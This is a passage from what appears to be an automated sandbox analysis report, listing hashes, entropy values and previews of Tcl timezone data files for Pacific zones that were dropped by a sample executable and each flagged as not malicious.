                                                                                                                                                                                                                                            Entropy (8bit):4.9796189407775255
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5RyJTLJ5FNMXGm2OHddHvpoxYoHsdMWdHPVtyn:SlSWB9eg/LJHjXDm2OHdFGxYoHgHPLy
                                                                                                                                                                                                                                            MD5:DF09960360D8CEDCA2A4DC19A177C4A6
                                                                                                                                                                                                                                            SHA1:9F73F271B8C85B25FE6392B8BF7465C92EFFE621
                                                                                                                                                                                                                                            SHA-256:161762334DFF48B1D58824911E1FF4171386EA18234DD3DD5B0798515593086A
                                                                                                                                                                                                                                            SHA-512:1BE9E0F90DA529C99E317F399BFDB913A076651CF8801A1849247B26A350A76D8B5807AB139F3DBB97790DDFC332BDBEB57B364BF67FA2BB440AFEDC4130A648
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guadalcanal) {.. {-9223372036854775808 38388 0 LMT}.. {-1806748788 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):733
                                                                                                                                                                                                                                            Entropy (8bit):4.244282318063802
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862mdHanCTCtBCv1yWQkHHLTaWJ+x+87W0x+8+yWSi+JW7+sWU0dwaW1j+FaW2:FeaC2twvY3knLGs+I87p+8d9i+J7s70c
                                                                                                                                                                                                                                            MD5:BA319E451BE323C852A8ABFC299DDA28
                                                                                                                                                                                                                                            SHA1:FC9314C162FF1FE1ED5E2C5DF962A55D4D6D8115
                                                                                                                                                                                                                                            SHA-256:42CB69ABC83415F63CA7D2A3E5314A41817AEE3206ECCC7172C50A74B1597DB0
                                                                                                                                                                                                                                            SHA-512:3BF733B9ED2A57B01BE173A8421B2D5A45888A230461EA0BD8C5B4AC7DC010BB527346731196141C70AFECDF88DD47AFE48636243DFC395D88E58231BEDF7D2A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guam) {.. {-9223372036854775808 -51660 0 LMT}.. {-3944626740 34740 0 LMT}.. {-2177487540 36000 0 GST}.. {-885549600 32400 0 +09}.. {-802256400 36000 0 GST}.. {-331891200 39600 1 GDT}.. {-281610000 36000 0 GST}.. {-73728000 39600 1 GDT}.. {-29415540 36000 0 GST}.. {-16704000 39600 1 GDT}.. {-10659600 36000 0 GST}.. {9907200 39600 1 GDT}.. {21394800 36000 0 GST}.. {41356800 39600 1 GDT}.. {52844400 36000 0 GST}.. {124819200 39600 1 GDT}.. {130863600 36000 0 GST}.. {201888000 39600 1 GDT}.. {209487660 36000 0 GST}.. {230659200 39600 1 GDT}.. {241542000 36000 0 GST}.. {977493600 36000 0 ChST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):344
                                                                                                                                                                                                                                            Entropy (8bit):4.640604617840767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/PeDDm2OHsVVoHvBrai3UNFv+rUXaWFvAHovj/0nvCv7p+v:MB86WXmdH0VCvBz0GOTA0/0y74v
                                                                                                                                                                                                                                            MD5:F3F0E64655FAA79E40860765EEBB5B77
                                                                                                                                                                                                                                            SHA1:7F6C2FC100AEABC26B7205AB53C1E016B12E4D60
                                                                                                                                                                                                                                            SHA-256:69319015799D32D3CF7C0A3E9991B4B1F3E0C5D1B4FBF400517350CCA9D2C3B7
                                                                                                                                                                                                                                            SHA-512:7C9238BCCB13B90D4DC9B5E776C421A42C25D21B4E026406F57FA1E70983E8F6BF1CE927AB9D0D6261C5C1802A8B810399F506915262F82F487417CFD704B2F1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Honolulu) {.. {-9223372036854775808 -37886 0 LMT}.. {-2334101314 -37800 0 HST}.. {-1157283000 -34200 1 HDT}.. {-1155436200 -34200 0 HST}.. {-880201800 -34200 1 HWT}.. {-769395600 -34200 1 HPT}.. {-765376200 -37800 0 HST}.. {-712150200 -36000 0 HST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.844454917943834
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yc6e8SHAIgOb6eKAN/NWyVheo:MByMdniinbtNWzo
                                                                                                                                                                                                                                            MD5:4244078A03C2493009EF2F6BDA2F326F
                                                                                                                                                                                                                                            SHA1:AC2FF3E91A8831A479B33DF32A0118BC2EB255D0
                                                                                                                                                                                                                                            SHA-256:6E52B361AC8A6A578C709F6D58AA7535F06C0CB1707081C2D5A63FA8545D955C
                                                                                                                                                                                                                                            SHA-512:398B32E0FAF80E40DF3ACD203DF380D61DC39322F0BA0388A18281BC26973945F45683A104B9A785BB9DF5E514322F6994F934289E4B56B7982F94D4528D4272
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:Pacific/Johnston) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                                            Entropy (8bit):4.669308556946547
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/KyXDm2OHEMmzQwXy29BVyv7y/fTVVFty:MB86KyTmdHEZzQUBVyDy/fZvty
                                                                                                                                                                                                                                            MD5:544A0A83241333805192A6F03888E359
                                                                                                                                                                                                                                            SHA1:99D2BE79D57B44BD538386F9E7551C9E1874D7E3
                                                                                                                                                                                                                                            SHA-256:0B1345555EC2B4738CC4DEBFE496C287966F238386263032FF1E27912CCBFBA6
                                                                                                                                                                                                                                            SHA-512:61C91265632D01FBB7F4C739368756C428258FA6C141E49E88B6C78ABEA6150A74B8DFCF14C5AADDA03C1EA6F04D122734654495C26B8614561786B1C5C7EF10
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kanton) {.. {-9223372036854775808 0 0 -00}.. {-1020470400 -43200 0 -12}.. {307627200 -39600 0 -11}.. {788871600 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.739672105601744
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/iSDm2OHjkeoHvmLVFFz4YWXfSzvjNv:MB86iGmdHpCvU4VfSbxv
                                                                                                                                                                                                                                            MD5:1B695BBB9C50F6AFC05F67DE30374160
                                                                                                                                                                                                                                            SHA1:08AD8BBB6C99EB36FC3E462DB41C6896F52F150C
                                                                                                                                                                                                                                            SHA-256:4F7235B956A5A01676BE05275E086D5157EBC24FD91022E87817020669F915F7
                                                                                                                                                                                                                                            SHA-512:DC35CB1C2E5E035A82F91D1B1F4B48D7B112D9B7A1A7DB9C4A4C42C4D58002E1ECD9D24B2EA5B624DBB526ADDF9A8AB37D4315843207C34C16B2EFE33A254752
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kiritimati) {.. {-9223372036854775808 -37760 0 LMT}.. {-2177415040 -38400 0 -1040}.. {307622400 -36000 0 -10}.. {788868000 50400 0 +14}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):394
                                                                                                                                                                                                                                            Entropy (8bit):4.441317927120857
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB869nmdHlCTvrvCvKcHwzHHI/HKOjHHwZaLYkcy:2ecrrqvGznISknwZaLxcy
                                                                                                                                                                                                                                            MD5:B489D7BDE8EB805B2A24726A6FB0C441
                                                                                                                                                                                                                                            SHA1:7997A33AA56857EC52B1198DBEF4CE1DB50D69FD
                                                                                                                                                                                                                                            SHA-256:B528E5E712E5F878603183E7CCFF55E5DB97CB47D7628BCB635342796317B899
                                                                                                                                                                                                                                            SHA-512:4898AC2747FB8620BE29933CC7AA344AF1A3B7777D1AFF08BB4C6CE6E7AF205581937CCB488F3CB39CC8CA7FB42EDC8E1CAD8BADC9FCA40E3CAD23271CD66FCB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kosrae) {.. {-9223372036854775808 -47284 0 LMT}.. {-3944631116 39116 0 LMT}.. {-2177491916 39600 0 +11}.. {-1743678000 32400 0 +09}.. {-1606813200 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-770634000 39600 0 +11}.. {-7988400 43200 0 +12}.. {915105600 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):304
                                                                                                                                                                                                                                            Entropy (8bit):4.5947337310364835
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/yEyDm2OH4T2eoHvmfKnOjvScHrkL/Xy2185k0YAov:MB86XmmdHWCv6KOjHHgLN8tby
                                                                                                                                                                                                                                            MD5:7D1FC9913941693ACBD6A3CCB2F34555
                                                                                                                                                                                                                                            SHA1:D07C8AAED1DF9614BCA6EEF0F72FB98BE46CF5EF
                                                                                                                                                                                                                                            SHA-256:38133BE70100D7DC244A680827879E6B240646C7C0B68F58652051E681A71985
                                                                                                                                                                                                                                            SHA-512:419F0A1D1D71C8F84765C7B54271D7EFD6A81F428751523A214ABB24A8770DD5A7666F634A20AF97D5AAB8F21C0DEF23DCDE068CF4C1CCC7639ABC43864A9DBC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kwajalein) {.. {-9223372036854775808 40160 0 LMT}.. {-2177492960 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-817462800 39600 0 +11}.. {-7988400 -43200 0 -12}.. {745934400 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.7986219497241995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHznHlUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/QxNn
                                                                                                                                                                                                                                            MD5:EB409C340A475B60993965A0E2892B6E
                                                                                                                                                                                                                                            SHA1:819881A078F34EF8FC55D71D829B82C56E6723D7
                                                                                                                                                                                                                                            SHA-256:935BC00C13863715D09463E54DC2A6FF0F1A7EEA8D5895C87836AA59716CBD57
                                                                                                                                                                                                                                            SHA-512:A28AF85022F8B3C2EE5F93BF6FDC0C349B73F25D88BA151ACE424EED1A95FA29608A6B1AD3D5FD952B2FB7F48DF6FDF8E6504F2B53E6782E4FF73335AF9A15C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Majuro) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.976348164850869
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHzrHeWNMXGm2OHOx5oHsdNpNFvvIVVFvYy:SlSWB9eg/cHeSDm2OHOnoH4/FvQVVFAy
                                                                                                                                                                                                                                            MD5:80CB45F42BAB1AA72CD7C7BC394DF3F8
                                                                                                                                                                                                                                            SHA1:8B5ED2BCCA1AEB41F22AFD14F46533959828B2BE
                                                                                                                                                                                                                                            SHA-256:AE0B5055C6E57516F23749B13681205EAD376E682959716A457B1377AF8160BA
                                                                                                                                                                                                                                            SHA-512:71562E340B7A96B91D04FCBCAF71B66EA725CA1BD1094343C4442F8F9A8C67A3BE378034849197407D21C3EE74E2C753B1FD3BAFF2378714B993AD9336236A0E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Marquesas) {.. {-9223372036854775808 -33480 0 LMT}.. {-1806676920 -34200 0 -0930}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.81307101485774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/nUDHz0HvUDHurKv:SlSWB9vsM3yciemHAIgObiecN/Zevn
                                                                                                                                                                                                                                            MD5:13CE48F8FF74BFCEFCB8D217D6357E38
                                                                                                                                                                                                                                            SHA1:296D31E3F868934C6EB34BF1BF4C23F3E1839294
                                                                                                                                                                                                                                            SHA-256:F62C6A2DEC1E9EC78115D5F14E5B9DB7C86F788662D2E68F7E6714F4A05DC974
                                                                                                                                                                                                                                            SHA-512:778813FC08EF803743F392000BECE73C1C079883DAFC26FAC0AF8FA3FA4AE1D94BA8F3CAA5E82DD4DB1A5F12AD49E123901908F5483E0E325952622AB4C4A26A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:Pacific/Midway) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):244
                                                                                                                                                                                                                                            Entropy (8bit):4.702705620563736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/JdDm2OHceoHx6sCH/ZdqvScH9cd0YAov:MB86J5mdH9CMhcHHauby
                                                                                                                                                                                                                                            MD5:30A8285FCCE2E98889E53DF60B906C3D
                                                                                                                                                                                                                                            SHA1:C7789CB11A2C8FE3861FF3C0A7A41F6CAFD87631
                                                                                                                                                                                                                                            SHA-256:22C367F3219B5FC736260D9DBFEF5FCB767F1A6BDA991C9352F790A3D1FFE884
                                                                                                                                                                                                                                            SHA-512:02DA82680588839B06F820979AECC78B7FBEAB9D6D49176B513B80F1C8BA2D55FB3674B19EFDD574EE6FC01539EF7C3081A4B34D14A54DACF367D816B62E5843
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Nauru) {.. {-9223372036854775808 40060 0 LMT}.. {-1545131260 41400 0 +1130}.. {-862918200 32400 0 +09}.. {-767350800 41400 0 +1130}.. {287418600 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.846897598147338
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHwMQA3WNMXGm2OH0SNoHoRWVGXyOyovFaSUGFAZvBByV:SlSWB9eg/Jm3SDm2OHJoHFGXCodZUGFd
                                                                                                                                                                                                                                            MD5:6E8EC957423917AE7A7EF503661C1A77
                                                                                                                                                                                                                                            SHA1:B4FA3C3E3F96C28B7DB87BFD441D2EE99CC81B6F
                                                                                                                                                                                                                                            SHA-256:869CCA656BE88E4E7481C75737C3656BAB6924AD1751505815AC719C59269842
                                                                                                                                                                                                                                            SHA-512:9047ABE673259699C7A548BC7B5636DD646DD382C751B796522F65404162AB1B0BB022FD274653921E5B23C847EE248AEF6749E15ED2CFC1DCE35BBA294D8251
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Niue) {.. {-9223372036854775808 -40780 0 LMT}.. {-543069620 -40800 0 -1120}.. {-173623200 -39600 0 -11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5139
                                                                                                                                                                                                                                            Entropy (8bit):3.65794255179185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:K/yg8hZbeS07HbbYTqge+gDrWnAxhejtB0e+Pwn1UVimqNQrKvyXrStkCDv:K/y7hNeS07sq0Erk10lINQrKvyXrwv
                                                                                                                                                                                                                                            MD5:E19700A894AA64715D14F501D8D2FA98
                                                                                                                                                                                                                                            SHA1:57CFC96E2EBB985720DB290F59181860AF2AC1AA
                                                                                                                                                                                                                                            SHA-256:5D16C3EF1DB996C1B8E33AD884C33946F77DA872F35F41EC3BD5B288F43CC9AF
                                                                                                                                                                                                                                            SHA-512:E11EAF2A7B217CDBEECB57635184F04171F0DB088FCC4702AA8D40A3A5453904592F5869849913E2EB02DC5941C84203A76D270E8930B0B691A3B9C39B78BF30
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Norfolk) {.. {-9223372036854775808 40312 0 LMT}.. {-2177493112 40320 0 +1112}.. {-599656320 41400 0 +1130}.. {152029800 45000 1 +1230}.. {162916200 41400 0 +1130}.. {1443882600 39600 0 +11}.. {1561899600 39600 0 +12}.. {1570287600 43200 1 +12}.. {1586012400 39600 0 +12}.. {1601737200 43200 1 +12}.. {1617462000 39600 0 +12}.. {1633186800 43200 1 +12}.. {1648911600 39600 0 +12}.. {1664636400 43200 1 +12}.. {1680361200 39600 0 +12}.. {1696086000 43200 1 +12}.. {1712415600 39600 0 +12}.. {1728140400 43200 1 +12}.. {1743865200 39600 0 +12}.. {1759590000 43200 1 +12}.. {1775314800 39600 0 +12}.. {1791039600 43200 1 +12}.. {1806764400 39600 0 +12}.. {1822489200 43200 1 +12}.. {1838214000 39600 0 +12}.. {1853938800 43200 1 +12}.. {1869663600 39600 0 +12}.. {1885993200 43200 1 +12}.. {1901718000 39600 0 +12}.. {1917442800 43200 1 +12}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):326
                                                                                                                                                                                                                                            Entropy (8bit):4.531117764974758
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/JcSDm2OHTYoHgnX2czO/FxgV62JFy:MB86JcGmdHTYCgX2czUjgM2ny
                                                                                                                                                                                                                                            MD5:2F1E92A11DF44C72DC305C13111DEA35
                                                                                                                                                                                                                                            SHA1:847F551C3D6C75CD2D0D6D87FCF3294CA8DD90B2
                                                                                                                                                                                                                                            SHA-256:238683C027D2319C33D975A837E9FC9D24DD53B1A67108EDBF7ABDF0DB050881
                                                                                                                                                                                                                                            SHA-512:E35D8C71AFDBB9A7507E873925001AEDE3734B1D235F509D19952E85279CBCC233A73412EA1F79CB534A45D36FEAA8AFDA98D9964DC93C7892B318F4AFC9A076
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Noumea) {.. {-9223372036854775808 39948 0 LMT}.. {-1829387148 39600 0 +11}.. {250002000 43200 1 +11}.. {257342400 39600 0 +11}.. {281451600 43200 1 +11}.. {288878400 39600 0 +11}.. {849366000 43200 1 +11}.. {857228400 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.985607855830399
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHurKeTFfXMXGm2OH2ivkeoHvUPi1TsYoHsdfWTVvvVFv:SlSWB9eg/XecDm2OH23eoHvWieYoHiWB
                                                                                                                                                                                                                                            MD5:E86D90DAA694B0EAC42F8C01346BC95B
                                                                                                                                                                                                                                            SHA1:CD29DEFC291C939296E86DC7EF5D0654D85285E8
                                                                                                                                                                                                                                            SHA-256:CCA96640AB3BC707224FA86D9AF66F9D53A204A97B370B2785BA8208688BF8B6
                                                                                                                                                                                                                                            SHA-512:937BA420061E3781F831779B458E914A0FC465C4B41796F8B7CB1E548822F5777A6450FC6002AB13EBC5C9F54E374D3ED731D05B2B302B95359BE34094E5062B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Pago_Pago) {.. {-9223372036854775808 45432 0 LMT}.. {-2445424632 -40968 0 LMT}.. {-1861879032 -39600 0 SST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.919381181565273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHugEZF3fMXGm2OHKvkeoHucRbgnJnoHvmdQ4+vScFAy:SlSWB9eg/Xg2PDm2OHK8eoHTWJnoHvmi
                                                                                                                                                                                                                                            MD5:2E6C7EC61C7E29A147475C223B163F6B
                                                                                                                                                                                                                                            SHA1:3A98D3441335224E7EBC0648990BCA1DE3BDF5C6
                                                                                                                                                                                                                                            SHA-256:97DE6C2C717BFEAD00F83B5D39D654C32CEE580226F5F084484EBAD57BBCE7FF
                                                                                                                                                                                                                                            SHA-512:5868C43966DDEBA8EC4BBBB29CDFDDFF0C7B01FD4D579FF655F3363029059F969B39C9221190672B6A2F7938583594AA0B103FC2A7ED573E2BC1C3A1623DE8DD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Palau) {.. {-9223372036854775808 -54124 0 LMT}.. {-3944624276 32276 0 LMT}.. {-2177485076 32400 0 +09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.809907977056877
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHuQTWLMbNMXGm2OHUVFvoHvmXUlgloWkcyf/vGpn:SlSWB9eg/XQyLMJDm2OHUVVoHvmXUKm2
                                                                                                                                                                                                                                            MD5:3F4987676F9C461895EDF9985AD22E06
                                                                                                                                                                                                                                            SHA1:A96E470209010B837EF5BB3AC93BAE74BF2CCF64
                                                                                                                                                                                                                                            SHA-256:5D363729A986E24C79F4B817CC88D2B22ACCCE3ADD20138D51C4422C4297AD6F
                                                                                                                                                                                                                                            SHA-512:988FB98EFD3F57F5D66A932CC6B9D0387E9B0951FC590E08DAF19ACF5E4F39BC1B25265F16E14930BCF394902F5F0EF507E0E91C98902DFB10FA16D716091AB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Pitcairn) {.. {-9223372036854775808 -31220 0 LMT}.. {-2177421580 -30600 0 -0830}.. {893665800 -28800 0 -08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.7682565894416005
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycaJHNPHAIgObaJHa6N/XyopJHYn:MByMdaJyiaJrtCopJ4n
                                                                                                                                                                                                                                            MD5:1B418E3A4239AAFE1E15B57FFF913FA1
                                                                                                                                                                                                                                            SHA1:0E278FCC058DE1B3F4715771819F14568A6C10BB
                                                                                                                                                                                                                                            SHA-256:F744CD8337C5C72023D61F348DD03F48824F817D62F54ACC6A23DDD8B0F9EDC4
                                                                                                                                                                                                                                            SHA-512:8E3E10B41CF64A07411B272C0BCA6DC7AA9FFBF625B31075651603B7D0A52A719F7174A67593BFDE45725C243D347D01560B2BC7813C2ABD2F4BF4B1BAD57E56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Guadalcanal)]} {.. LoadTimeZoneFile Pacific/Guadalcanal..}..set TZData(:Pacific/Pohnpei) $TZData(:Pacific/Guadalcanal)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.742862539020017
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycaJHNPHAIgObaJHa6N/X3HpBJHYn:MByMdaJyiaJrtHpBJ4n
                                                                                                                                                                                                                                            MD5:514C399D990C87271812440A4B19FB21
                                                                                                                                                                                                                                            SHA1:E1512482D10C8984DCD69C883F07C412E144081A
                                                                                                                                                                                                                                            SHA-256:5BB11553F711BD591617F657A9D1811CC3E3FB46374F6867316A7C8F6B3765D9
                                                                                                                                                                                                                                            SHA-512:DB227134822EA73407B6C0259FF7413D4961B558F3018BFF51E4E426DDB2DF581DCF7A6DE9E4890CE35F785BC3D07CC880DA883C93D73FFB249F403701BD8023
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Guadalcanal)]} {.. LoadTimeZoneFile Pacific/Guadalcanal..}..set TZData(:Pacific/Ponape) $TZData(:Pacific/Guadalcanal)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.945354510868153
                                                                                                                                                                                                                                            Encrypted:false
